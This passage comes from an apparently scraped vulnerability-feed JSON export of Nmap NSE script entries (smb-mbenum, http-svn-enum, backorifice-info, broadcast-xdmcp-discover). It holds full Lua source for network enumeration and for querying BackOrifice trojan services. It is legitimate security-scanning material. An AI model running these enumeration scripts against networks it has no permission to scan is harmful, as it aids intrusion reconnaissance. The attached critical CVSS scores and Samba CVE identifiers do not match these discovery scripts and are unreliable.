SV_TYPE_NT = { long = \"Windows NT/2000/XP/2003 server\", short = \"NT\" },\n SV_TYPE_WFW = { long = \"Windows for workgroups\", short = \"WFW\" },\n SV_TYPE_SERVER_MFPN = { long = \"Microsoft File and Print for Netware\", short=\"MFPN\" },\n SV_TYPE_SERVER_NT = { long = \"Server\", short = \"SRV\" },\n SV_TYPE_POTENTIAL_BROWSER = { long = \"Potential Browser\", short = \"POTBRWS\" },\n SV_TYPE_BACKUP_BROWSER = { long = \"Backup Browser\", short = \"BCKBRWS\"},\n SV_TYPE_MASTER_BROWSER = { long = \"Master Browser\", short = \"MBRWS\"},\n SV_TYPE_DOMAIN_MASTER = { long = \"Domain Master Browser\", short = \"DOMBRWS\"},\n SV_TYPE_WINDOWS = { long = \"Windows 95/98/ME\", short=\"WIN95\"},\n SV_TYPE_DFS = { long = \"DFS Root\", short = \"DFS\"},\n SV_TYPE_TERMINALSERVER = { long = \"Terminal Server\", short = \"TS\" },\n}\n\nOutputFormat = {\n BY_TYPE_H = 1,\n BY_TYPE_V = 2,\n BY_TYPE_V_DETAILED = 3,\n}\n\n\naction = function(host, port)\n\n local status, smbstate = smb.start(host)\n local err, entries\n local path = (\"\\\\\\\\%s\\\\IPC$\"):format(host.ip)\n local detail_level = 1\n local format = stdnse.get_script_args(\"smb-mbenum.format\") or OutputFormat.BY_TYPE_V_DETAILED\n local filter = stdnse.get_script_args(\"smb-mbenum.filter\") or ServerTypes.SV_TYPE_ALL\n local domain = stdnse.get_script_args(\"smb-mbenum.domain\")\n\n filter = tonumber(filter) or ServerTypes[filter]\n format = tonumber(format)\n\n if ( not(filter) ) then\n return \"\\n The argument smb-mbenum.filter contained an invalid value.\"\n end\n\n if ( not(format) ) then\n return \"\\n The argument smb-mbenum.format contained an invalid value.\"\n end\n\n local errstr = nil\n status, err = smb.negotiate_protocol(smbstate, {})\n if ( not(status) ) then\n log(\"ERROR: smb.negotiate_protocol failed\")\n errstr = \"\\n ERROR: Failed to connect to browser service: \" .. err\n else\n\n status, err = smb.start_session(smbstate, {})\n if ( not(status) ) then\n log(\"ERROR: smb.start_session failed\")\n errstr = \"\\n ERROR: Failed to connect to browser service: \" .. err\n else\n\n status, err = smb.tree_connect(smbstate, path, {})\n if ( not(status) ) then\n log(\"ERROR: smb.tree_connect failed\")\n errstr = \"\\n ERROR: Failed to connect to browser service: \" .. err\n else\n\n status, entries = msrpc.rap_netserverenum2(smbstate, domain, filter, detail_level)\n if ( not(status) ) then\n log(\"ERROR: msrpc.rap_netserverenum2 failed\")\n -- 71 == 0x00000047, ERROR_REQ_NOT_ACCEP\n -- http://msdn.microsoft.com/en-us/library/cc224501.aspx\n if entries:match(\"= 71$\") then\n errstr = \"Not a master or backup browser\"\n else\n errstr = \"\\n ERROR: \" .. entries\n end\n end\n end\n\n status, err = smb.tree_disconnect(smbstate)\n if ( not(status) ) then log(\"ERROR: smb.tree_disconnect failed\") end\n end\n\n status, err = smb.logoff(smbstate)\n if ( not(status) ) then log(\"ERROR: smb.logoff failed\") end\n end\n\n status, err = smb.stop(smbstate)\n if ( not(status) ) then log(\"ERROR: smb.stop failed\") end\n\n if errstr then\n return errstr\n end\n\n local results, output = {}, {}\n for k, _ in pairs(ServerTypes) do\n for _, server in ipairs(entries) do\n if ( TypeNames[k] and (server.type & ServerTypes[k]) == ServerTypes[k] ) then\n results[TypeNames[k].long] = results[TypeNames[k].long] or {}\n if ( format == OutputFormat.BY_TYPE_V_DETAILED ) then\n table.insert(results[TypeNames[k].long], server)\n else\n table.insert(results[TypeNames[k].long], server.name)\n end\n end\n end\n end\n\n if ( format == OutputFormat.BY_TYPE_H ) then\n for k, v in pairs(results) do\n local row = (\"%s: %s\"):format( k, table.concat(v, \",\") )\n table.insert(output, row)\n end\n table.sort(output)\n elseif( format == OutputFormat.BY_TYPE_V ) then\n for k, v in pairs(results) do\n v.name = k\n table.insert(output, v)\n end\n table.sort(output, function(a,b) return a.name < b.name end)\n elseif( format == OutputFormat.BY_TYPE_V_DETAILED ) then\n for k, v in pairs(results) do\n local cat_tab = tab.new(3)\n table.sort(v, function(a,b) return a.name < b.name end )\n for _, server in pairs(v) do\n tab.addrow(\n cat_tab,\n server.name,\n (\"%d.%d\"):format(server.version.major,server.version.minor),\n server.comment\n )\n end\n table.insert(output, { name = k, tab.dump(cat_tab) } )\n end\n table.sort(output, function(a,b) return a.name < b.name end)\n end\n\n return stdnse.format_output(true, output)\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T21:42:51", "description": "Enumerates users of a Subversion repository by examining logs of most recent commits.\n\n## Script Arguments \n\n#### http-svn-enum.url \n\nThis is a URL relative to the scanned host eg. /default.html (default: /).\n\n#### http-svn-enum.count \n\nThe number of logs to fetch. Defaults to the last 1000 commits.\n\n#### slaxml.debug \n\nSee the documentation for the [slaxml](<../lib/slaxml.html#script-args>) library. \n\n#### smbdomain, smbhash, smbnoguest, smbpassword, smbtype, smbusername \n\nSee the documentation for the [smbauth](<../lib/smbauth.html#script-args>) library. \n\n#### http.host, http.max-body-size, http.max-cache-size, http.max-pipeline, http.pipeline, http.truncated-ok, http.useragent \n\nSee the documentation for the [http](<../lib/http.html#script-args>) library. \n\n## Example Usage \n \n \n nmap --script http-svn-enum <target>\n \n\n## Script Output \n \n \n PORT STATE SERVICE REASON\n 443/tcp open https syn-ack\n | http-svn-enum:\n | Author Count Revision Date\n | gyani 183 34965 2015-07-24\n | robert 1 34566 2015-06-02\n | david 2 34785 2015-06-28\n \n\n## Requires \n\n * [http](<../lib/http.html>)\n * [shortport](<../lib/shortport.html>)\n * [slaxml](<../lib/slaxml.html>)\n * [stdnse](<../lib/stdnse.html>)\n * [tab](<../lib/tab.html>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2015-07-25T09:56:07", "type": "nmap", "title": "http-svn-enum NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2017-08-15T07:26:00", "id": "NMAP:HTTP-SVN-ENUM.NSE", "href": "https://nmap.org/nsedoc/scripts/http-svn-enum.html", "sourceData": "local http = require \"http\"\nlocal shortport = require \"shortport\"\nlocal slaxml = require \"slaxml\"\nlocal stdnse = require \"stdnse\"\nlocal tab = require \"tab\"\n\ndescription = [[Enumerates users of a Subversion repository by examining logs of most recent commits.\n]]\n\n---\n-- @usage nmap --script http-svn-enum <target>\n--\n-- @args http-svn-enum.count The number of logs to fetch. Defaults to the last 1000 commits.\n-- @args http-svn-enum.url This is a URL relative to the scanned host eg. /default.html (default: /).\n--\n-- @output\n-- PORT STATE SERVICE REASON\n-- 443/tcp open https syn-ack\n-- | http-svn-enum:\n-- | Author Count Revision Date\n-- | gyani 183 34965 2015-07-24\n-- | robert 1 34566 2015-06-02\n-- | david 2 34785 2015-06-28\n--\n-- @xmloutput\n-- <table></table>\n-- <table>\n-- <elem>Author</elem>\n-- <elem>Count</elem>\n-- <elem>Revision</elem>\n-- <elem>Date</elem>\n-- </table>\n-- <table>\n-- <elem>gyani</elem>\n-- <elem>183</elem>\n-- <elem>34965</elem>\n-- <elem>2015-07-24</elem>\n-- </table>\n-- <table>\n-- <elem>robert</elem>\n-- <elem>1</elem>\n-- <elem>34566</elem>\n-- <elem>2015-06-02</elem>\n-- </table>\n-- <table>\n-- <elem>david</elem>\n-- <elem>2</elem>\n-- <elem>34785</elem>\n-- <elem>2015-06-28</elem>\n-- </table>\n\nauthor = \"Gyanendra Mishra\"\n\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\n\ncategories = {\"default\", \"discovery\", \"safe\"}\n\nlocal ELEMENTS = {\n [\"creator-displayname\"] = \"author\",\n [\"version-name\"] = \"version\",\n [\"date\"] = \"date\",\n}\n\nlocal function get_callback(name, unames, temp)\n if ELEMENTS[name] then\n return function(content)\n if not content then content = \"unknown\" end --useful for \"nil\" authors\n temp[ELEMENTS[name]] = name == \"date\" and content:sub(1, 10) or content\n if temp.date and temp.version and temp.author then\n unames[temp.author] = {unames[temp.author] and unames[temp.author][1] + 1 or 1, temp.version, temp.date}\n end\n end\n end\nend\n\nportrule = shortport.http\n\naction = function(host, port)\n\n local count = tonumber(stdnse.get_script_args(SCRIPT_NAME .. \".count\")) or 1000\n local url = stdnse.get_script_args(SCRIPT_NAME .. \".url\") or \"/\"\n local output, revision, unames = tab.new(), nil, {}\n\n local options = {\n header = {\n [\"Depth\"] = 0,\n },\n }\n\n -- first we fetch the current revision number\n local response = http.generic_request(host, port, \"PROPFIND\", url, options)\n if response and response.status == 207 then\n\n local parser = slaxml.parser:new()\n parser._call = {startElement = function(name)\n parser._call.text = name == \"version-name\" and function(content) revision = tonumber(content) end end,\n closeElement = function(name) parser._call.text = function() return nil end end\n }\n parser:parseSAX(response.body, {stripWhitespace=true})\n\n if revision then\n\n local start_revision = revision > count and revision - count or 1\n local content = '<?xml version=\"1.0\"?> <S:log-report xmlns:S=\"svn:\"> <S:start-revision>'.. start_revision .. '</S:start-revision> <S:discover-changed-paths/> </S:log-report>'\n\n options = {\n header = {\n [\"Depth\"] = 1,\n },\n content = content,\n }\n\n local temp = {}\n response = http.generic_request(host, port, \"REPORT\", url, options)\n if response and response.status == 200 then\n\n parser._call.startElement = function(name) parser._call.text = get_callback(name, unames, temp) end\n parser._call.closeElement = function(name) if name == \"log-item\" then temp ={} end parser._call.text = function() return nil end end\n parser:parseSAX(response.body, {stripWhitespace=true})\n\n tab.nextrow(output)\n tab.addrow(output, \"Author\", \"Count\", \"Revision\", \"Date\")\n\n for revision_author, data in pairs(unames) do\n tab.addrow(output, revision_author, data[1], data[2], data[3])\n end\n\n if next(unames) then return output end\n end\n end\n end\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T21:47:24", "description": "Connects to a BackOrifice service and gathers information about the host and the BackOrifice service itself. \n\nThe extracted host information includes basic system setup, list of running processes, network resources and shares. \n\nInformation about the service includes enabled port redirections, listening console applications and a list of BackOrifice plugins installed with the service.\n\n## Script Arguments \n\n#### backorifice-info.seed \n\nEncryption seed (default derived from password, or 31337 for no password).\n\n#### backorifice-info.password \n\nEncryption password (defaults to no password).\n\n## Example Usage \n \n \n nmap --script backorifice-info <target> --script-args backorifice-info.password=<password>\n \n\n## Script Output \n \n \n 31337/udp open|filtered BackOrifice\n | backorifice-info:\n | PING REPLY\n | !PONG!1.20!HAL9000!\n | SYSTEM INFO\n | System info for machine 'HAL9000'\n | Current user: 'Dave'\n | Processor: I586\n | Win32 on Windows 95 v4.10 build 2222 - A\n | Memory: 63M in use: 30% Page file: 1984M free: 1970M\n | C:\\ - Fixed Sec/Clust: 64 Byts/Sec: 512, Bytes free: 2147155968/21471\n | ...155968\n | D:\\ - CD-ROM\n | PROCESS LIST\n | PID - Executable\n | 4293872589 C:\\WINDOWS\\SYSTEM\\KERNEL32.DLL\n | 4294937581 C:\\WINDOWS\\SYSTEM\\MSGSRV32.EXE\n | 4294935933 C:\\WINDOWS\\SYSTEM\\MPREXE.EXE\n | 4294843869 C:\\WINDOWS\\SYSTEM\\MSTASK.EXE\n | 4294838549 C:\\WINDOWS\\SYSTEM\\ .EXE\n | 4294864917 C:\\WINDOWS\\EXPLORER.EXE\n | 4294880413 C:\\WINDOWS\\TASKMON.EXE\n | 4294878445 C:\\WINDOWS\\SYSTEM\\SYSTRAY.EXE\n | 4294771309 C:\\WINDOWS\\WINIPCFG.EXE\n | 4294772081 C:\\WINDOWS\\SYSTEM\\WINOA386.MOD\n | NETWORK RESOURCES - NET VIEW\n | (null) '(null)' - Microsoft Network - UNKNOWN! (Network root?):CONTAINER\n | (null) 'WORKGROUP' - (null) - DOMAIN:CONTAINER\n | (null) '\\\\HAL9000' - - SERVER:CONTAINER\n | (null) '\\\\HAL9000\\DOCUMENTS' - sample comment 2 - SHARE:DISK\n | (null) '\\\\WIN982' - - SERVER:CONTAINER\n | (null) '\\\\WIN982\\BO' - tee hee hee comment - SHARE:DISK\n | SHARELIST\n | 'DOCUMENTS'-C:\\WINDOWS\\DESKTOP\\DOCUMENTS 'sample comment 2' RO:'' RW:'\n | ...'' Disk PERSISTANT READONLY\n | 'IPC$'- 'Remote Inter Process Communication' RO:'' RW:'' IPC FULL\n | REDIRECTED PORTS\n | 0 redirs displayed\n | LISTENING CONSOLE APPLICATIONS\n | 0 apps listed\n | PLUGIN LIST\n |_ End of plugins\n \n\n## Requires \n\n * [bits](<../lib/bits.html>)\n * [nmap](<../lib/nmap.html>)\n * [shortport](<../lib/shortport.html>)\n * [stdnse](<../lib/stdnse.html>)\n * [string](<>)\n * [table](<>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2011-04-20T07:45:10", "type": "nmap", "title": "backorifice-info NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2018-09-02T20:51:05", "id": "NMAP:BACKORIFICE-INFO.NSE", "href": "https://nmap.org/nsedoc/scripts/backorifice-info.html", "sourceData": "local bits = require \"bits\"\nlocal nmap = require \"nmap\"\nlocal shortport = require \"shortport\"\nlocal stdnse = require \"stdnse\"\nlocal string = require \"string\"\nlocal table = require \"table\"\n\ndescription = [[\nConnects to a BackOrifice service and gathers information about\nthe host and the BackOrifice service itself.\n\nThe extracted host information includes basic system setup, list\nof running processes, network resources and shares.\n\nInformation about the service includes enabled port redirections,\nlistening console applications and a list of BackOrifice plugins\ninstalled with the service.\n]]\n\n---\n-- @usage\n-- nmap --script backorifice-info <target> --script-args backorifice-info.password=<password>\n--\n-- @arg backorifice-info.password Encryption password (defaults to no password).\n-- @arg backorifice-info.seed Encryption seed (default derived from password, or 31337 for no password).\n--\n--@output\n--31337/udp open|filtered BackOrifice\n--| backorifice-info:\n--| PING REPLY\n--| !PONG!1.20!HAL9000!\n--| SYSTEM INFO\n--| System info for machine 'HAL9000'\n--| Current user: 'Dave'\n--| Processor: I586\n--| Win32 on Windows 95 v4.10 build 2222 - A\n--| Memory: 63M in use: 30% Page file: 1984M free: 1970M\n--| C:\\ - Fixed Sec/Clust: 64 Byts/Sec: 512, Bytes free: 2147155968/21471\n--| ...155968\n--| D:\\ - CD-ROM\n--| PROCESS LIST\n--| PID - Executable\n--| 4293872589 C:\\WINDOWS\\SYSTEM\\KERNEL32.DLL\n--| 4294937581 C:\\WINDOWS\\SYSTEM\\MSGSRV32.EXE\n--| 4294935933 C:\\WINDOWS\\SYSTEM\\MPREXE.EXE\n--| 4294843869 C:\\WINDOWS\\SYSTEM\\MSTASK.EXE\n--| 4294838549 C:\\WINDOWS\\SYSTEM\\ .EXE\n--| 4294864917 C:\\WINDOWS\\EXPLORER.EXE\n--| 4294880413 C:\\WINDOWS\\TASKMON.EXE\n--| 4294878445 C:\\WINDOWS\\SYSTEM\\SYSTRAY.EXE\n--| 4294771309 C:\\WINDOWS\\WINIPCFG.EXE\n--| 4294772081 C:\\WINDOWS\\SYSTEM\\WINOA386.MOD\n--| NETWORK RESOURCES - NET VIEW\n--| (null) '(null)' - Microsoft Network - UNKNOWN! (Network root?):CONTAINER\n--| (null) 'WORKGROUP' - (null) - DOMAIN:CONTAINER\n--| (null) '\\\\HAL9000' - - SERVER:CONTAINER\n--| (null) '\\\\HAL9000\\DOCUMENTS' - sample comment 2 - SHARE:DISK\n--| (null) '\\\\WIN982' - - SERVER:CONTAINER\n--| (null) '\\\\WIN982\\BO' - tee hee hee comment - SHARE:DISK\n--| SHARELIST\n--| 'DOCUMENTS'-C:\\WINDOWS\\DESKTOP\\DOCUMENTS 'sample comment 2' RO:'' RW:'\n--| ...'' Disk PERSISTANT READONLY\n--| 'IPC$'- 'Remote Inter Process Communication' RO:'' RW:'' IPC FULL\n--| REDIRECTED PORTS\n--| 0 redirs displayed\n--| LISTENING CONSOLE APPLICATIONS\n--| 0 apps listed\n--| PLUGIN LIST\n--|_ End of plugins\n--\n\nauthor = \"Gorjan Petrovski\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"default\", \"discovery\", \"safe\"}\ndependencies = {\"backorifice-brute\"}\n\n\nportrule = shortport.port_or_service (31337, \"BackOrifice\", \"udp\")\n\n\n--variables\nlocal g_packet = 0\n\n--\"constants\"\nlocal MAGICSTRING =\"*!*QWTY?\"\nlocal TYPE = {\n ERROR = 0x00,\n PARTIAL_PACKET = 0x80,\n CONTINUED_PACKET = 0x40,\n PING = 0x01,\n SYSINFO = 0x06,\n PROCESSLIST = 0x20,\n NETVIEW = 0x39,\n NETEXPORTLIST = 0x12,\n REDIRLIST = 0x0D,\n APPLIST = 0x3F,\n PLUGINLIST = 0x2F\n}\n\n\n--table of commands which have output\nlocal cmds = {\n {cmd_name=\"PING REPLY\",p_code=TYPE.PING,arg1=\"\",arg2=\"\",\n filter = function(data)\n data = string.gsub(data,\" \",\"\")\n return data\n end},\n {cmd_name=\"SYSTEM INFO\",p_code=TYPE.SYSINFO,arg1=\"\",arg2=\"\",\n filter = function(data)\n if string.match(data,\"End of system info\") then return nil end\n return data\n end},\n {cmd_name=\"PROCESS LIST\",p_code=TYPE.PROCESSLIST,arg1=\"\",arg2=\"\",\n filter = function(data)\n if string.match(data,\"End of processes\") then return nil end\n data = string.gsub(data,\"pid\",\"PID\")\n return data\n end},\n {cmd_name=\"NETWORK RESOURCES - NET VIEW\",p_code=TYPE.NETVIEW,arg1=\"\",arg2=\"\",\n filter = function(data)\n if string.match(data,\"Network resources:\") then return nil end\n if string.match(data,\"End of resource list\") then return nil end\n return data\n end},\n {cmd_name=\"SHARELIST\",p_code=TYPE.NETEXPORTLIST,arg1=\"\",arg2=\"\",\n filter = function(data)\n if string.match(data,\"Shares as returned by system:\") then return nil end\n if string.match(data,\"End of shares\") then return nil end\n return data\n end},\n {cmd_name=\"REDIRECTED PORTS\",p_code=TYPE.REDIRLIST,arg1=\"\",arg2=\"\",\n filter = function(data)\n if string.match(data,\"Redirected ports:%s\") then return nil end\n return data\n end},\n {cmd_name=\"LISTENING CONSOLE APPLICATIONS\",p_code=TYPE.APPLIST,arg1=\"\",arg2=\"\",\n filter = function(data)\n if string.match(data,\"Active apps:\") then return nil end\n return data\n end},\n -- I !think! plugin list MUST be last because it causes problems server-side\n {cmd_name=\"PLUGIN LIST\",p_code=TYPE.PLUGINLIST,arg1=\"\",arg2=\"\",\n filter = function(data)\n if string.match(data,\"Plugins:\") then return nil end\n return data\n end}\n}\n\nlocal function gen_next_seed(seed)\n seed = seed*214013 + 2531011\n seed = seed & 0xffffff\n return seed\nend\n\nlocal function gen_initial_seed(password)\n if password == nil then\n return 31337\n else\n local y = #password\n local z = 0\n\n for x = 1,y do\n local pchar = string.byte(password,x)\n z = z + pchar\n end\n\n for x=1,y do\n local pchar = string.byte(password,x)\n if (x-1)%2 == 1 then\n z = z - (pchar * (y-(x-1)+1))\n else\n z = z + (pchar * (y-(x-1)+1))\n end\n z = z % 0x7fffffff\n end\n z = (z*y) % 0x7fffffff\n return z\n end\nend\n\n--BOcrypt returns encrypted/decrypted data\nlocal function BOcrypt(data, password, initial_seed )\n if data==nil then return end\n local output = {}\n\n local seed\n if(initial_seed == nil) then\n --calculate initial seed\n seed = gen_initial_seed(password)\n else\n --in case initial seed is set by backorifice brute\n seed = initial_seed\n end\n\n for i = 1, #data do\n local data_byte = string.byte(data,i)\n\n --calculate next seed\n seed = gen_next_seed(seed)\n --calculate encryption key based on seed\n local key = bits.arshift(seed,16) & 0xff\n\n local crypto_byte = data_byte ~ key\n output[i] = string.char(crypto_byte)\n if i == 256 then break end --ARGSIZE limitation\n end\n return table.concat(output, \"\")\nend\n\nlocal function BOpack(type_packet, str1, str2)\n -- create BO packet\n local size = #MAGICSTRING + 4*2 + 3 + #str1 + #str2\n local data = MAGICSTRING .. string.pack(\"<I4 I4 B zz\", size, g_packet, type_packet, str1, str2)\n g_packet = g_packet + 1\n return data\nend\n\nlocal function BOunpack(packet)\n local header_format = (\"<c%d I4 I4 B\"):format(#MAGICSTRING)\n if #packet < string.packsize(header_format) then\n return nil, TYPE.ERROR\n end\n local magic, packetsize, packetid, type_packet, pos = string.unpack(header_format, packet)\n\n if magic ~= MAGICSTRING then return nil,TYPE.ERROR end --received non-BO packet\n if packetsize ~= #packet then\n -- No idea how often this happens or if it should be a fatal error\n stdnse.debug1(\"Wrong packet size: expected %d, got %d bytes\", packetsize, #packet)\n end\n\n local data = packet:sub(pos)\n\n return data, type_packet\nend\n\nlocal function insert_version_info(host,port,BOversion,BOhostname,initial_seed,password)\n if(port.version==nil) then port.version={} end\n if(port.version.name==nil) then\n port.version.name =\"BackOrifice\"\n port.version.name_confidence = 10\n end\n if(port.version.product==nil) then port.version.product =\"BackOrifice trojan\" end\n if(port.version.version == nil) then port.version.version = BOversion end\n if(port.version.extrainfo == nil) then\n if password == nil then\n if initial_seed == nil then\n port.version.extrainfo = \"no password\"\n else\n port.version.extrainfo = \"initial encryption seed=\"..initial_seed\n end\n else\n port.version.extrainfo = \"password=\"..password\n end\n end\n port.version.hostname = BOhostname\n if(port.version.ostype == nil) then port.version.ostype = \"Windows\" end\n nmap.set_port_version(host, port)\n nmap.set_port_state(host, port, \"open\")\nend\n\naction = function( host, port )\n --initial seed is set by backorifice-brute\n local initial_seed = stdnse.get_script_args( SCRIPT_NAME .. \".seed\" )\n local password = stdnse.get_script_args(SCRIPT_NAME .. \".password\")\n local socket = nmap.new_socket(\"udp\")\n local try = nmap.new_try(function() socket:close() end)\n socket:set_timeout(5000)\n\n local output_all={}\n\n for i=1,#cmds do\n --send command\n local data = BOpack( cmds[i].p_code, cmds[i].arg1, cmds[i].arg2 )\n data = BOcrypt(data, password, initial_seed)\n try(socket:sendto(host, port, data))\n\n --receive info\n local output, response, p_type, multi_flag\n output = {}\n output.name = cmds[i].cmd_name\n multi_flag = false\n while true do\n response = try(socket:receive())\n response = BOcrypt(response,password,initial_seed)\n response, p_type = BOunpack(response) -- p_type -> error, singular, partial, continued\n\n if p_type ~= TYPE.ERROR then\n local tmp_str = cmds[i].filter(response)\n if tmp_str ~= nil then\n if cmds[i].p_code==TYPE.PING then\n --invalid chars for hostname are allowed on old windows boxes\n local BOversion, BOhostname = string.match(tmp_str,\"!PONG!(1%.20)!(.*)!\")\n if BOversion==nil then\n --in case of bad PING reply return \"\"\n return\n else\n --fill up version information\n insert_version_info(host,port,BOversion,BOhostname,initial_seed,password)\n end\n end\n\n table.insert(output,tmp_str)\n end\n\n --singular\n if (p_type & TYPE.PARTIAL_PACKET)==0x00\n and (p_type & TYPE.CONTINUED_PACKET)==0x00 then break end\n\n --first\n if (p_type & TYPE.CONTINUED_PACKET)==0x00 then\n multi_flag = true\n end\n\n --last\n if (p_type & TYPE.PARTIAL_PACKET)==0x00 then break end\n end\n\n end\n --gather all responses in table\n table.insert(output_all,output)\n end\n\n socket:close()\n return stdnse.format_output(true,output_all)\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T21:46:37", "description": "Discovers servers running the X Display Manager Control Protocol (XDMCP) by sending a XDMCP broadcast request to the LAN. Display managers allowing access are marked using the keyword Willing in the result.\n\n## Script Arguments \n\n#### broadcast-xdmcp-discover.timeout \n\nsocket timeout (default: 5s)\n\n## Example Usage \n \n \n nmap --script broadcast-xdmcp-discover\n \n\n## Script Output \n \n \n Pre-scan script results:\n | broadcast-xdmcp-discover:\n |_ 192.168.2.162 - Willing\n \n\n## Requires \n\n * [os](<>)\n * [stdnse](<../lib/stdnse.html>)\n * [table](<>)\n * [xdmcp](<../lib/xdmcp.html>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2012-01-26T19:35:19", "type": "nmap", "title": "broadcast-xdmcp-discover NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2015-11-05T20:41:05", "id": "NMAP:BROADCAST-XDMCP-DISCOVER.NSE", "href": "https://nmap.org/nsedoc/scripts/broadcast-xdmcp-discover.html", "sourceData": "local os = require \"os\"\nlocal stdnse = require \"stdnse\"\nlocal table = require \"table\"\nlocal xdmcp = require \"xdmcp\"\n\ndescription = [[\nDiscovers servers running the X Display Manager Control Protocol (XDMCP) by\nsending a XDMCP broadcast request to the LAN. Display managers allowing access\nare marked using the keyword Willing in the result.\n]]\n\n---\n-- @usage\n-- nmap --script broadcast-xdmcp-discover\n--\n-- @output\n-- Pre-scan script results:\n-- | broadcast-xdmcp-discover:\n-- |_ 192.168.2.162 - Willing\n--\n-- @args broadcast-xdmcp-discover.timeout socket timeout (default: 5s)\n\nauthor = \"Patrik Karlsson\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"broadcast\", \"safe\"}\n\n\nprerule = function() return true end\n\nlocal arg_timeout = stdnse.parse_timespec(stdnse.get_script_args(SCRIPT_NAME .. \".timeout\"))\n\naction = function()\n\n local host, port = { ip = \"255.255.255.255\" }, { number = 177, protocol = \"udp\" }\n local options = { timeout = 1 }\n local helper = xdmcp.Helper:new(host, port, options)\n local status = helper:connect()\n\n local req = xdmcp.Packet[xdmcp.OpCode.BCAST_QUERY]:new(nil)\n local status, err = helper:send(req)\n if ( not(status) ) then\n return false, err\n end\n\n local timeout = arg_timeout or 5\n local start = os.time()\n local result = {}\n repeat\n\n local status, response = helper:recv()\n if ( not(status) and response ~= \"TIMEOUT\" ) then\n break\n elseif ( status ) then\n local status, _, _, rhost = helper.socket:get_info()\n if ( response.header.opcode == xdmcp.OpCode.WILLING ) then\n result[rhost] = true\n else\n result[rhost] = false\n end\n end\n\n until( os.time() - start > timeout )\n\n local output = {}\n for ip, res in pairs(result) do\n if ( res ) then\n table.insert(output, (\"%s - Willing\"):format(ip))\n else\n table.insert(output, (\"%s - Unwilling\"):format(ip))\n end\n end\n return stdnse.format_output(true, output)\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T09:38:11", "description": "Prints a list of ports found in each state. \n\nNmap ordinarily summarizes \"uninteresting\" ports as \"Not shown: 94 closed ports, 4 filtered ports\" but users may want to know which ports were filtered vs which were closed. This script will expand these summaries into a list of ports and port ranges that were found in each state.\n\n## Example Usage \n \n \n nmap -sV --script=port-states <target>\n\n## Script Output \n \n \n Host script results:\n | port-states:\n | tcp:\n | open: 22,631\n | closed: 